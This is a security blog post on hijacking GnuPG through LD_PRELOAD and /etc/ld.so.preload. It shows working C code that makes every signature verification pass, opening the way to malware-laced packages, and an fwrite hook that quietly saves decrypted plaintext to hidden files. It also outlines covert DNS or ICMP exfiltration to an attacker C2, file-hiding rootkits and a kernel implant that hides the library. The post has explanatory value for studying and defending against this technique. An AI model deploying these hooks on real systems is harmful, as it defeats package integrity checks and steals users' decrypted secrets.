Subverting Cryptography with Dynamic Library Interpolation

By Michael Vaughan

Cryptography is one of the most important security measures employed by organizations all over the world. Unlike many controls, cryptography is as ubiquitous as it is provably effective, protecting information both as it is stored and as it travels. Software, documents, and virtually all information that is handled securely depend on cryptography, often as the only security measure. The mathematics that drives the field provides provable security, but there is always a gap between theory and practice, and that gap is often the source of significant exploits and vulnerabilities. This post explores one such exploit by combining an OS feature frequented by malware authors with a practical implementation of cryptography on *NIX systems, GnuPG.

Dynamic Libraries

When writing software, there are two strategies for linking foreign code as libraries: static and dynamic linking. Static linking copies all of the library code into the final executable, resolving all relocations and creating a completely self-contained program. This results in larger programs, which is often undesirable because the same library code is repeated in every executable that uses it. Dynamic linking avoids this by letting executables share a single copy of each library, and it became the more common approach as a result. Static linking has since come back into favor as disk sizes have increased, with modern languages and their build systems increasingly supporting it, sometimes by default. The tradeoff of dynamic linking is that the executable depends on the dynamic linker/loader to resolve relocations to the shared code at run time. This dependence on, and trust in, the dynamic linker is a relationship that can be taken advantage of, for both benign and malicious purposes.

Dynamic Libraries in Linux

Let’s say that two libraries export the same symbol, maybe it’s puts(). How does the dynamic linker know which one the application is looking for? It turns out that it searches the loaded libraries in a specific order and uses the first match. In the case of puts(), it would usually find the symbol in libc, since libc is early in that order. It then resolves the symbol, saves the address of puts() in the application’s GOT so later calls skip the lookup, and jumps to the function to run it. To see the full order for yourself you can use ldd, a wrapper script for ld.so that will list everything out:

ldd run on /bin/ls, on a Linux Mint computer

As we can see from the output, /bin/ls uses SELinux, libc, libdl, pthread, and other shared libraries. When /bin/ls needs to resolve a symbol, ld.so first checks in linux-vdso, doesn’t find it there, then libselinux.so, and finally finds it in libc. A common malware technique is to intercept calls to expected functions by modifying this order, effectively injecting a malicious shared object into the runtime of the process. This can be accomplished in a few ways, but the easiest and likely most often used method is by employing the LD_PRELOAD environment variable. From man ld.so(8):

      LD_PRELOAD
              A list of additional, user-specified, ELF shared objects to be
              loaded before all others.  This feature can be used to
              selectively override functions in other shared objects.

As we can see here, LD_PRELOAD lets us alter the order by putting a shared library at the top of the list. It even tells us that we can use it to override functions, which is exactly what we’ll do. Making a shared object is possible in a few different languages, but it’s easiest to do in C. As a first exercise we can intercept calls to rand():
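The original listing is not reproduced here, so the following is a minimal sketch of what such a library could look like rather than the author's exact code. The source file name lib.c and the constant 4 are assumptions made for illustration.

```c
/* lib.c: a tiny preload library that replaces rand().
 * One way to build it (file names are illustrative):
 *   gcc -shared -fPIC lib.c -o lib.so
 */
#include <stdlib.h>

/* Same name and signature as libc's rand(), so the dynamic linker
 * resolves calls to this definition when it is found first. */
int rand(void) {
    return 4; /* chosen by fair dice roll */
}
```

Running a dynamically linked program with LD_PRELOAD pointing at the resulting shared object would then be expected to make every rand() call in that program return 4.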

Chosen by fair dice roll.

For this to work, the replacement needs the same function signature as the function you are intercepting. To compile with GCC you need to pass -shared and -fPIC, which create a shared library and compile it as position-independent code, respectively. As a demonstration we’ll intercept the calls to rand() in a short program that prints some random numbers. All we need to do is set LD_PRELOAD when running the program to see the effect, no recompilation or static linking required.

If we run ldd on the binary with LD_PRELOAD set to our library, we can see where it lands in the search order:

As we can see here, our library lib.so is placed above libc. Strictly speaking, LD_PRELOAD does not place our library at the very top of the list, at least not anymore. The first entry, linux-vdso.so.1, is the Linux kernel’s vDSO, a virtual dynamic shared object that the kernel maps into every process to provide fast userspace versions of a few system calls, such as clock_gettime(). This is done for performance reasons and cannot be interfered with using LD_PRELOAD, but it does not impede this technique. When a preloaded program calls rand(), the lookup checks the vDSO, doesn’t find the symbol, and then checks our library and resolves it from there successfully. We effectively bypass libc.

One issue with using LD_PRELOAD, of course, is that it requires an environment variable to be set. While the variable is not displayed by default, it has to be exported by the shell or prepended to the invocation of every targeted program. There is a better solution: a little-known file called /etc/ld.so.preload. This file does not normally exist, but the dynamic linker checks for it whenever a dynamically linked program starts. If the path to a shared library is placed in this file, the linker reads in the path and inserts that library at the top of the search order. This works system-wide, and it is not subject to the restrictions that LD_PRELOAD faces with setuid binaries. If you get root access once, you can plant code that will run in every dynamically linked process on the system.
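Because the file normally does not exist, its presence is itself worth checking for. As a rough sketch from the defender's side, assuming the whitespace-separated list format described in ld.so(8), the helper below prints whatever a preload file names. The function name list_preload_entries is made up for this example, and the sketch ignores any other syntax the loader may accept.

```c
#include <stdio.h>
#include <string.h>

/* Prints each entry of a preload file to `out` and returns the number of
 * entries found, or -1 if the file cannot be opened (which is the normal
 * case for /etc/ld.so.preload on a clean system). */
int list_preload_entries(const char *path, FILE *out) {
    FILE *fp = fopen(path, "r");
    if (!fp) return -1;

    char line[4096];
    int count = 0;
    while (fgets(line, sizeof line, fp)) {
        /* Assumption: entries are separated by whitespace only */
        for (char *tok = strtok(line, " \t\r\n"); tok;
             tok = strtok(NULL, " \t\r\n")) {
            fprintf(out, "preloaded: %s\n", tok);
            count++;
        }
    }
    fclose(fp);
    return count;
}
```

Calling list_preload_entries("/etc/ld.so.preload", stdout) and getting anything other than -1 would be a reason to look closely at the listed libraries.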

Subverting GnuPG

GnuPG, GPG, or the GNU Privacy Guard is a free and open source implementation of OpenPGP. It is the de-facto standard for PGP on Linux and most *NIX systems, and is used for many different applications, including package signatures and personal document encryption/signing. Since it is used for code signing, its integrity is required for a secure system, free from application backdoors and malicious man-in-the-middle attacks. Compromising it allows an attacker to trivially serve malware to a user over standard channels, paving the way for man-in-the-middle attacks on virtually any downloaded and signed file.

GnuPG is written in C as a dynamically linked application. It performs all of its actual cryptographic operations through a separate library, libgcrypt. Since it is dynamically linked, intercepting calls to its core functions is as easy as in the last example. To get a sense of what functions it actually calls, we can run the application through ltrace. This program is similar to strace, but instead of logging system calls, it logs dynamic library calls. Since syscalls are often made through library wrapper functions, the output of the two tools can look similar, but they are distinct. If we run GnuPG through ltrace, we can isolate libgcrypt functions to take a look at.

Compromising Digital Signatures

As a first exercise, we can compromise the integrity of digital signatures. As an attacker with root access we can apply this to all GnuPG operations conducted on the system. If we run a verification with --verify on a file through ltrace, we can see that it calls a specific function a number of times: gcry_pk_verify(). The prefix ‘gcry’ suggests that it is a libgcrypt function, and it is in fact the one that actually verifies the signature for a given chunk of data. ltrace tells us that this function returns 0, and a trip to the libgcrypt documentation gives some context:

The function returns 0 when the signature is valid, meaning the data has not been tampered with. It takes a gcry_sexp_t sig argument, which is the signature as an S-expression. It also takes S-expressions for the data chunk and the public key we’re verifying against. gcry_error_t is a custom type but ultimately compiles down to an integer. With this knowledge, we can make a simple library that ensures that all signature verifications pass:

#include <gcrypt.h>

// same signature as libgcrypt's gcry_pk_verify(); 0 reports a valid signature
gcry_error_t gcry_pk_verify(gcry_sexp_t sig, gcry_sexp_t data, gcry_sexp_t pkey) {
   return 0;
}

            Since errors are not fun.

Now if we were to MITM the system’s package repositories, we could replace packages with malware-laced variants and the package manager would accept them without complaint, since it relies on GnuPG to verify package signatures. In one line of code we’ve compromised what the libgcrypt developers call the “most commonly used” functionality, and can deploy it across the entire system.

Subverting Data Encryption

GnuPG, and PGP more generally, are primarily used for digital signatures and encryption, often at the same time. Now that we’ve subverted the signature check, we can also subvert encryption by saving information as it is decrypted. If we again run GPG through ltrace and observe its behavior during a decryption operation, searching the output for the known plaintext of the file reveals several places where it is handled:

Output of ltrace from a decrypt operation. Typos included.

As we can see here, the test file is handled by memcpy() and fwrite(). We can also see that a reference to the memory holding it, 0x26c65c0 in this case, is passed to another libgcrypt function gcry_md_write(), as well as fwrite(). The latter function is what actually outputs the information to the screen, either as text or as raw bytes. Since that is the final form of the information, it’s best to try and intercept this function call so we can read the fully decrypted data. Fortunately, since fwrite() is a libc function, we can do that easily. fwrite() is often called several times to output the chunks of the file in order.

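#define _GNU_SOURCE // must precede all includes; RTLD_NEXT needs it later
#include <stdio.h>
#include <string.h>

static int AMGPG = 0; // set to 1 when the host process looks like gpg

__attribute__((constructor))
static void initgpg(void) {
   // naive check: does the start of our command line contain "gpg"?
   char cmdline[512] = {0};
   FILE * fp = fopen("/proc/self/cmdline", "r");
   if(!fp) return;
   // arguments are NUL-separated, so strstr() below only sees argv[0]
   fread(cmdline, 1, sizeof(cmdline) - 1, fp);
   fclose(fp);
   if(strstr(cmdline, "gpg")) {
       AMGPG = 1; // we are gpg
   }
}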

The initgpg() function is compiled as a constructor function, which runs automatically when the library is loaded into memory. This is a GCC feature. It identifies the current process using a non-portable and naive method: reading its own cmdline and searching it for “gpg”. This is reasonably effective, as most users don’t change the name of GnuPG, though more sophisticated methods of determining this exist. For now, this is appropriate for almost all systems that use the program. Then we can write our interception for fwrite():

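// RTLD_NEXT needs _GNU_SOURCE defined before the first #include in this file
#include <dlfcn.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

// AMGPG, chunk and hiddenpath are the globals described in the text
size_t (*o_fwrite)(const void *, size_t, size_t, FILE *);

size_t fwrite(const void *ptr, size_t size, size_t nmemb, FILE *stream) {
   // resolve libc's real fwrite() once, on first use
   if (!o_fwrite) o_fwrite = dlsym(RTLD_NEXT, "fwrite");

   if(AMGPG) {
       // append output to secret file
       char fname[1000];
       snprintf(fname, sizeof(fname), "%s%04d", hiddenpath, chunk);
       int fd = open(fname, O_WRONLY | O_APPEND | O_CREAT, 0644);

       if (fd >= 0) { // open() returns -1 on failure; 0 is a valid descriptor
           ssize_t res = write(fd, ptr, size*nmemb);
           if (res < 0 || (size_t)res != size*nmemb) {
               perror("Error writing data to file! ");
           }
           close(fd);
           chunk++;
       } else {
           perror("Error creating file: ");
       }
   }

   // always hand the data on so GnuPG behaves as usual
   return o_fwrite(ptr, size, nmemb, stream);
}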

It’s important to note here that any fwrite() calls made by GPG will be caught by this, which in the case of decryption will just be the file content. It appears that this is the only place where GnuPG uses fwrite(), which makes sense: unlike status messages, file content can vary widely in size, which makes the buffered I/O of the fwrite() API more appropriate. The “chunk” variable is declared as a global, set to zero and incremented with every chunk. This preserves the order and makes the pieces easy to find later. Similarly, “hiddenpath” is a global constant holding a file path that ends with “chunk”, to which the chunk number is appended via snprintf(). o_fwrite is the function pointer that is resolved to the original libc fwrite() function. This is done manually at runtime using dlsym() with the RTLD_NEXT pseudo-handle, which searches for the named symbol in the libraries that come after the current one in the search order (shown by ldd). The function pointer is resolved from libc and saved as o_fwrite, which is called at the end so that the data is still written as GnuPG expects.

Further Attack Avenues

More attack methods are possible and effective against this application. The attacker could intercept calls to gcry_pk_genkey(), or the other key generation functions, to make them use a convincing but backdoored PRNG. The chunking strategy is naive outside of a proof of concept: the chunk counter restarts at zero with every execution, so chunks from separate runs land in the same files on disk. This is trivial to improve for actual engagements. A more practical strategy would be to send the file content via a covert channel. One could Base32 encode the data and send it as DNS requests to an attacker C2, use ICMP data sections, or simply make a request with something like libcurl. An LD_PRELOAD rootkit is also possible, which by intercepting libc functions like readdir() and stat() can hide files on disk from utilities like ls and ps. This could be exploited not only to hide secret data but also to hide the existence of the malware itself. With the same root privileges used to install the library in /etc/ld.so.preload, an attacker could drop a kernel implant to hide the malicious library from the maps list of each process. Such an implant could hook reads from the seq_file interface behind /proc/self/maps and remove the library’s entries from the list, making it nearly undetectable by userspace utilities.
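Base32 comes up above because its alphabet survives in DNS names, where case is not preserved and most punctuation is not allowed. As an illustration of the encoding step only, here is a small sketch of an unpadded RFC 4648 Base32 encoder. The function name base32_encode and the choice to omit '=' padding are assumptions of this example, not something taken from the original code.

```c
#include <stddef.h>
#include <stdint.h>

/* Encodes `len` bytes from `src` as unpadded RFC 4648 Base32 into `dst`.
 * `dst` must have room for (len * 8 + 4) / 5 + 1 bytes.
 * Returns the number of characters written, not counting the NUL. */
size_t base32_encode(const uint8_t *src, size_t len, char *dst) {
    static const char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567";
    uint32_t buffer = 0; /* holds bits that have not been emitted yet */
    int bits = 0;        /* number of pending bits in `buffer` */
    size_t out = 0;

    for (size_t i = 0; i < len; i++) {
        buffer = (buffer << 8) | src[i];
        bits += 8;
        /* Emit one character for every complete group of 5 bits */
        while (bits >= 5) {
            dst[out++] = alphabet[(buffer >> (bits - 5)) & 0x1F];
            bits -= 5;
        }
    }
    /* Left-align any leftover bits in a final 5-bit group */
    if (bits > 0) {
        dst[out++] = alphabet[(buffer << (5 - bits)) & 0x1F];
    }
    dst[out] = '\0';
    return out;
}
```

With this sketch, the six bytes of "foobar" encode to the ten characters MZXW6YTBOI, which matches the RFC 4648 test vector with its padding removed.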
